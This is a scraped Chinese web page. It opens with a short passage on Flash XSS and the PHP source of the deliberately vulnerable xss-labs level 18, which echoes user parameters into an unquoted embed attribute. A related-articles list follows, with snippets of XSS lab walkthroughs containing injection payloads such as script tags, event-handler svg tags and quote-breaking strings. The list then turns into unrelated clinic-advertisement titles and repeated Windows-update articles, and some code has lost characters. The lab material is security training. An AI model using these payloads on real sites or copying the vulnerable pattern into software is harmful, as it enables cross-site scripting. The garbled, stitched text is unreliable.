元素将外部内容嵌入文档中的指定位置。此内容由外部应用程序或其他交互式内容源(如浏览器插件)提供。支持src属性和事件属性。Flash XSS攻击总结
后来发现 火狐不支持SWF,ie允许。。
Level18:
php代码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");window.location.href="level19.php?arg01=a&arg02=b";
}
</script>
<title>欢迎来到level18</title>
</head>
<body>
<h1 align=center>欢迎来到level18</h1>
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
</body>
</html>
后边的都是flash有关的,,,就先写到这吧。。。。
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- XSS漏洞攻击(二)
XSS漏洞攻击(二) 前言 之前已经总结过一部分xss的一些绕过方式,但由于其他原因没有总结完,现在有时间了,于是参考了大牛的博客,继续总结了一下。 正文 XSS攻击常见利用方式(后续) 7.HTTP头流量包注入 这一部分需要抓包改包&…...
2024/4/28 7:20:48 - XSS-games
关于xss的概念什么的,这里就不赘述了 在本地搭建了一个xss靶机,都复现一遍 level1 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv"content-type" content"text/html;charsetutf-8"…...
2024/4/21 14:00:58 - BuuCTF[第二章 web进阶]XSS闯关
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式!!! 1.第一关,无任何过滤 一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.nod…...
2024/4/28 6:18:25 - xss-labs-master靶机1-20关解题思路
xss-labs-master靶机是xss-labs作者在github上发布的后来不知道为什么就把它删了,可能是因为这个靶机属于静态页面有一个通用的推广方式(具体在后面),不过还是希望读者使用实战中的攻击手段学习,这个靶机是对XSS漏洞的专项练习,一…...
2024/4/21 14:00:55 - 【xss攻击】靶场xss-labs
目录0x001 输入参数无任何过滤0x002 标签闭合0x003 对<>进行了实体编码0x004 对<>替换为空0x005 对script进行过滤,没有对<>和javascript进行过滤0x006 大小写混写0x007 关键字双写0x008 编码绕过0x009 编码检查字段绕过0x010 隐藏表单0x011 refe…...
2024/4/28 3:14:01 - XSS漏洞
漏洞简介 Cross-Site Scripting(为了与CSS区别,安全领域叫做XSS)攻击是注入的一种,主要是将恶意脚本注入到可信站点的 HTML页面等网页文件中,当攻击者将注入恶意脚本的网页连接发送给用户。用户打开链接,浏览器会认为恶意脚本来 …...
2024/4/28 7:38:26 - xss-labs通关大合集
漏洞原理,看这里哇 目录xss-labslevel1level2level3level4level5level6level7level8level9level10level11level12level13level1415关level16level17level18level19Flash产生的xss问题主要有两种方式:常见的可触发xss的危险函数有:xss-labs 文…...
2024/4/28 6:03:08 - XSS挑战之旅
level-1 在“name”后面写什么,网页就显示什么。 查看源码,发现写入的数据在<>标签的外面,那么name的值直接换成JS: <script>alert(1)</script> <svg/onloadalert(1)> <script>confirm(1)</sc…...
2024/4/28 15:04:56 - WEB漏洞-XSS跨站之代码绕过与httpOnly绕过
WEB漏洞-XSS跨站之代码绕过与httpOnly绕过什么是HttpOnly?对方开启HttpOnly你在盗取cookie失败的情况下可以采用其他方案手工判断xss跨站漏洞常用代码:echoimg标签csshrefform标签input标签iframe标签svg标签level 1level 2(">闭合标签绕过)如何…...
2024/4/20 15:40:27 - N1BOOK XSS漏洞
level 1 反射型XSS 观察url username<script>alert(1)</script>level 2 查看源代码发现 这里做了编码 因为本身是放在script标签里,只需要闭合就可 username123;alert(1);//level 3 无果 换一个标签后发现可行 username<img src"javacri…...
2024/4/20 15:40:26 - [靶场] XSS-Labs 14-20
由于有Flash XSS,需要配置一下环境,下载Flash和JPEXS(Flash反编译工具)。 14. Level14-图片EXIF注入 这关卡的iframe引用的地址打不开,我们自己写一个简单的放在本地服务器上,引用对应的URL就行ÿ…...
2024/4/20 15:40:25 - 成都双眼皮抽脂医院
...
2024/4/27 23:15:07 - 成都美莱做的成都哪家成都哪家双眼皮修复好
...
2024/4/20 15:40:23 - 使用Python turtle画图时,画完图形窗口一下子消失,退出窗口的几个解决方法
使用Python turtle画图时,画完图形窗口一下子退出消失怎么办,如何能够停留在画完的窗口呢?退出窗口的几个解决方法程序退出画图界面的原因,本质上来说就是程序执行完成了,程序自然会退出。只要我们能够想办法让程序在画完图片后,不退出就好了。turtle提供了几个可以让窗口…...
2024/4/20 15:40:22 - 成都江涛双眼皮案例
...
2024/4/20 15:40:22 - 长治成都华美做成都华美做双眼皮最好
...
2024/4/20 15:40:31 - 长沙做双眼皮医生最好
...
2024/4/20 15:40:31 - 长沙双眼皮 AD美莱
...
2024/4/20 15:40:29 - 疤克使用方法不敢割双眼皮还是贴
...
2024/4/21 14:00:53 - 疤痕体质疤痕体质做完疤痕体做了疤痕体做疤克擦双眼皮有用吗
...
2024/4/21 14:00:51
最新文章
- 行列视平台的应用
行列视自助式生产报表系统是一个功能强大的数据分析和报表生成工具。它提供了简单易用的界面和丰富的功能,帮助用户从海量数据中提取洞察,并生成定制化的报表。 该系统具有直观的操作界面,无论您是数据分析专家还是初学者,都能轻…...
2024/4/28 16:32:23 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - 华为海思2024春招数字芯片岗机试题(共9套)
huawei海思2024春招数字芯片岗机试题(共9套,有答案和解析,答案非官方,未仔细校正,仅供参考)(WX:didadidadidida313,加我备注:CSDN huawei数字题目,谢绝白嫖哈)…...
2024/4/28 13:37:24 - 微信小程序实现左滑删除
效果 实现思路 使用的是官方提供的movable-area 嵌套movable-view 1、movable-area:注意点,需要设置其高度,否则会出现列表内容重叠的现象。 2、由于movable-view需要向右移动,左滑的时候给删除控件展示的空间,故 mov…...
2024/4/22 23:38:58 - 阿里云弹性计算通用算力型u1实例性能评测,性价比高
阿里云服务器u1是通用算力型云服务器,CPU采用2.5 GHz主频的Intel(R) Xeon(R) Platinum处理器,ECS通用算力型u1云服务器不适用于游戏和高频交易等需要极致性能的应用场景及对业务性能一致性有强诉求的应用场景(比如业务HA场景主备机需要性能一致)…...
2024/4/24 9:46:48 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/4/28 13:52:11 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/4/28 3:28:32 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/4/26 23:05:52 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/4/28 13:51:37 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/4/27 17:58:04 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/4/27 14:22:49 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/4/28 1:28:33 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/4/28 15:57:13 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/4/27 17:59:30 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/4/25 18:39:16 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/4/28 1:34:08 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/4/26 19:03:37 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/4/28 1:22:35 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/4/25 18:39:14 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/4/26 23:04:58 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/4/27 23:24:42 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/4/28 5:48:52 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/4/26 19:46:12 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/4/27 11:43:08 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/4/27 8:32:30 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57